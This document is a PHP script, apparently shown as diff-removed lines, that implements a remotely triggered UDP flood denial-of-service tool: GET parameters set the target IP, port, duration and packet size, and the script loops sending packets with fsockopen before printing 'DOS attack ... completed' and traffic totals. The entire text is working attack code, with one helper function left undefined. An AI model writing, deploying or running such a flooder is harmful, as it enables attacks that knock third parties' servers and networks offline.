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- <?php
- if(isset($_GET['ip']) &&
- isset($_GET['exTime']) &&
- isset($_GET['port']) &&
- isset($_GET['timeout']) &&
- isset($_GET['exTime']) &&
- $_GET['exTime'] != "" &&
- $_GET['port'] != "" &&
- $_GET['ip'] != "" &&
- $_GET['timeout'] != "" &&
- $_GET['exTime'] != ""
- )
- {
- $IP=$_GET['ip'];
- $port=$_GET['port'];
- $executionTime = $_GET['exTime'];
- $noOfBytes = $_GET['noOfBytes'];
- $data = "";
- $timeout = $_GET['timeout'];
- $packets = 0;
- $counter = $noOfBytes;
- $maxTime = time() + $executionTime;;
- while($counter--)
- {
- $data .= "X";
- }
- $data .= " I-47";
- print "DDoS Now ... <br>";
- while(1)
- {
- $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
- if($socket)
- {
- fwrite($socket , $data);
- fclose($socket);
- $packets++;
- }
- if(time() >= $maxTime)
- {
- break;
- }
- }
- echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
- echo "Total Number of Packets Sent : " . $packets . "<br />";
- echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
- echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
- }
- else
- {
- }
- ?>
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